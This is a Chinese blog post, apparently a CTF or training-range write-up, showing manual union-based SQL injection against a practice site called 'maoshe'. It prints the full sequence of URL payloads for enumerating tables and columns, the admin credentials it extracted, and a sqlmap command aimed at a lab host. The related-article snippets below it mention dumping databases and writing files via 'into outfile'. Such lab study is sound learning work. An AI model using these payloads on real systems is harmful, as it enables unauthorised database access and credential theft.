记一次猫舍注入

已于 2023-07-08 22:09:56 修改
阅读量159 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
于 2023-03-24 08:50:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61804402/article/details/129743506
版权

手动:

一、对数据库进行判断

进入页面,点击查看新闻(出现 ?id=1) 说明为传参页面

?id=1

构造 1=1 页面正常显示

?id=1%20and%201=1

构造1=2 页面报错,说明存在漏洞

?id=1%20and%201=2

利用 (order by) 查询列

?id=1%20and%201=1%20order%20by%201

?id=1%20and%201=1%20order%20by%202

?id=1%20and%201=1%20order%20by%203

由1-3,发现2有,3没有——说明数据表只有两个字段

至此判断:四行两列

之后判断回显点

通常用联合查询 (union select)

?id=1%20and%201=2%20union%20select%201,2

二、查询相关内容

1、查询当前数据库名称:?id=1%20and%201=2%20union%20select%201,database()

_maoshe

2、查询表名:?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1

_admin

3、查询字段内容:

?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%200,3

_Id

?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%201,3

_username

?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%202,3

_password

4、查询确切数据

id:1

username:admin

password:hellohack

Sqlmap

python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 --delay 1

对其进行盲注发现有一个Time盲注、一个Boolean盲注

之后就对其数据库进行扫描

发现有三个数据库

由于手动注入的缘故,这里就直接扫描maoshe了

发现四张表——且有一张带有关键字"admin"

我们首先扫描这张表

看到三个字段,即:id,password,username

再通过查询就可以得到想要的数据了

南风未起念成疾
关注
专栏目录
实验吧ctf-web题:这个看起来有点简单
Elvira
08-22 7513
sql注入,sqlmap,union,information_schema
一次猫舍由外到内的渗透撞库操作提取-flag
m0_65606241的博客
06-06 1301
猫舍靶场由外网打点进入内网后通过内网漏洞提权做撞库操作,最后拿到我们需要的成果
SQL手工注入漏洞测试(MySQL数据库)
WEB渗透测试 从入门到萌新
03-31 2116
靶场地址SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养1、我们先找出注入点 2、测试
SQL注入sqli-labs学习(less-1)
Yy10205473的博客
10-17 2881
sqli-labs:less-1 sqli-labs靶场网址. 通过sqli-labs中的题目来学习sql注入 sql注入的基本步骤 (1)判断是否存在注入,判断类型并且闭合语句 (2)使用order by 关键字来判断字段数 (3)选择注入语句,使用union查询或者报错注入 (4)获取数据库用户,版本,当前连接的数据库等信息 (5)获取某个数据库表的信息,获取列信息 (6)获取表中的数据 手工注入 进入less-1页面,根据页面的英文提示,发现需要我们输入参数 在后面添加参数。 http://10.1
Union注入攻击
qq_53365842的博客
04-21 2022
1.判断注入点 主要是判断两个条件 1.我们传入的参数是否可控 2.我们传入的参数能否在数据库执行 ?id=1' ?id=1' and 1=1 --+ ?id=1' and 1=2 --+ 尝试单引号注入,发现报错信息 http://192.168.183.150:8081/Less-1/?id=1%27 将单引号闭合后,页面返回正常 http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=1%20--+ 2.查询字段 判断字段个数 ?id=1
一次靶场sql注入练习
qq_45405626的博客
03-12 181
个人进行的靶场练习,又复习了一遍
一次用Python挑战SQL注入
weixin_44371842的博客
04-13 912
前言 最近哥们给我分享了一个靶场地址,疫情在家闲着无聊便拿来挑战一下。 靶场地址 分析 可以看到,题目要求是拿到管理员密码即可。 再进入靶机页面瞅瞅,看来就是要在url上操作了 简单加一个and 1=1和and 1=2,发现1=1时,显示下面的猫舍介绍,1=2时,不显示猫舍介绍。这个变化就作为分辨依据。 开始挑战 先拿一手user()(此时我已经忘题目要求要拿管理员密码...
一次简单的内网靶场实验
weixin_45701675的博客
04-16 249
一、SQL注入getshell 1、直接SQL语法写文件 (1)Mysql导出函数: into outfile into dumpfile [可以写16进制写入] (2)1290的安全性报错: 是5.0版本之后,来禁止MySQL给本地存放数据 需要修改MySQL的配置文件写一个:secure-file-priv=来防止1290的安全性报错 (3)这里需要注意: 我们得写绝对路径,绝对路径我们可以通过让网页PHP报错出来,并且双写\来防止\被MySQL转义了 (4)最终语句:(靶场)宠物猫 异国
SQL注入靶场:辛巴猫舍
Zeker62的博客
07-28 5104
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容 说明id=3 的时候,数据表内容已经"见底"了 于是我们就知道了这个数据表有四行,包括id=0的初始页面 查:有多少列 使用order by 语句. 我从 1~3查,发现3没有,2有. 那么就证明这个数据表就两个字段 读者可以
猫舍室内装饰设计模型
07-31
猫舍室内装饰设计模型】是一种专为满足猫咪生活需求和人类审美而设计的专业室内设计方案。这个模型结合了3D设计技术,旨在创造出既实用又美观的猫舍环境,为猫咪提供一个舒适、有趣的活动空间,同时也能成为家居...
sqlmap自动化注入猫舍靶场练习
weixin_45540609的博客
04-15 953
使用 python sqlmap.py -u 加上url 扫描存在漏洞,一路enter,paramenter显示有bool盲注 --dbs查看有哪些数据库,然后-D进入maoshe数据库 --tables查看有哪些数据表,-T进入数据表admin --columns查看有哪些字段 算了,直接在admin后面加 --dump脱库吧!铛铛,成功! ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
技术资料分享nRF24L01P(新版无线模块控制IC)很好的技术资料.zip
11-08
技术资料分享nRF24L01P(新版无线模块控制IC)很好的技术资料.zip
C++ 课程设计项目,基于 Qt 制作的经典小游戏愤怒的小鸟 FlappyBird源代码
11-08
C++ 课程设计项目,基于 Qt 制作的经典小游戏愤怒的小鸟 FlappyBird源代码 点击屏幕使小鸟向上飞行 不要让小鸟撞到障碍物
控件以及双指放大缩小图片、单指拖动图片.zip
11-08
内容概要:本资源聚焦 Android 编程实战,包含毕业设计示例、完整的 Android 项目源码及文档分享。采用 MVC 模式进行架构设计,结合 JSP 技术与 SQL Server 2000 数据库管理系统,实现高效的 Android 应用开发。 适用人群:Android 开发初学者、计算机专业学生进行毕业设计参考、希望提升 Android 开发技能的程序员。 实用场景及目标:适用于开发各类 Android 应用项目,帮助开发者快速构建稳定、功能丰富的应用程序,同时为毕业设计提供优质的模板和思路。 说明:资源提供了详细的代码注释和文档说明,方便学习者理解和上手,助力提升 Android 开发能力和项目实战经验。
【路径规划】基于matlab FMM快速行进法船舶路径规划【Matlab仿真 2291期】.md
11-08
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
Python基于 YOLOv8 的甲骨文原始拓片图像单字分割识别模型源代码+使用说明
11-08
针对原始拓片图像中的甲骨文文字分割识别包括以下两个阶段: 目标检测:基于 YOLOv8 目标检测模型,对甲骨文文字所在的矩形区域进行提取。 字符识别:基于 YOLOv8 图像分类模型,对文字图像进行分类,判断该字形所代表的具体字符内容。 同时基于 PyQt5 制作了一个简单的识别器前端程序。 使用说明 首先安装环境依赖包,项目目前采用 ONNX Runtime 部署模型推理。 pip install -r requirements.txt 若需要使用 GPU 进行推理,则需要安装: pip install onnxruntime-gpu 可以在本项目 Releases 中下载我训练好的模型权重文件,解压到项目中相应的位置(位于 inferences/models/ 下),运行 main.py 即可。 python main.py
几种常见简单滤波器用于二维图像降噪,包括均值、中值、高斯、低通、双边滤波器,语言是python
最新发布
11-08
每个滤波器均打包在不同的文件之内,以其功能命名,有均值滤波器、中值滤波器、高斯滤波器、低通滤波器、双边滤波器。应用场景为二维mat矩阵,同理可扩展到任意二维图像降噪,读者仅需更改输入输出文件路径即可调用
大一html网页制作作业 猫舍寄养
06-02
大一的HTML网页制作作业通常是要求学生使用HTML语言和CSS样式表来设计并实现一个静态的网页。如果题目是猫舍寄养,那么可以考虑以下内容: 1. 页面布局:设计页面的整体布局,如头部、导航栏、内容区域等,可以使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值